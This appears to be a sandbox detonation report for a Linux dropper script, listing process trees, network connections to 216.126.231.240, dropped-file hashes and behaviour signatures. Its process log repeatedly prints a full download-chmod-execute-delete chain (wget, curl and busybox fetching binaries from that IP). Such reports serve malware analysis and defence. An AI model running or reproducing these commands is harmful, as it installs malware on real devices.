[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/chmod
[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/rm
[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
Network
| Country | Destination | Domain | Proto |
| US | 151.101.1.91:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.1.91:443 | ocp-ingress.fastly.gnome.org | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 84.17.50.8:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-20 03:52
Reported
2024-11-20 03:54
Platform
debian9-armhf-20240611-en
Max time kernel
47s
Max time network
51s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | N/A |
| N/A | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | N/A |
| N/A | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | N/A |
| N/A | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | N/A |
| N/A | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | N/A |
| N/A | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | N/A |
| N/A | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | N/A |
| N/A | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | N/A |
| N/A | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | N/A |
| N/A | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | N/A |
| N/A | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | N/A |
| N/A | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | N/A |
| N/A | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | N/A |
| N/A | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | N/A |
| N/A | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | N/A |
| N/A | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | N/A |
| N/A | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /usr/bin/curl | N/A |
Processes
/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/chmod
[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/rm
[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/wget
[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/chmod
[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/rm
[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/wget
[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/chmod
[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/rm
[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/chmod
[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/rm
[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/wget
[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/chmod
[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/rm
[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/chmod
[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/rm
[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/wget
[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/chmod
[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/rm
[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/wget
[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/chmod
[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/rm
[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/wget
[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/chmod
[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/rm
[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/wget
[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/chmod
[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/rm
[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/wget
[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/chmod
[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/rm
[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/wget
[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/chmod
[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/rm
[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/wget
[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/chmod
[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/rm
[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/wget
[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/chmod
[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/rm
[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/wget
[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/chmod
[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/rm
[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/wget
[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/chmod
[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/rm
[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/wget
[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/chmod
[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/rm
[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/wget
[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
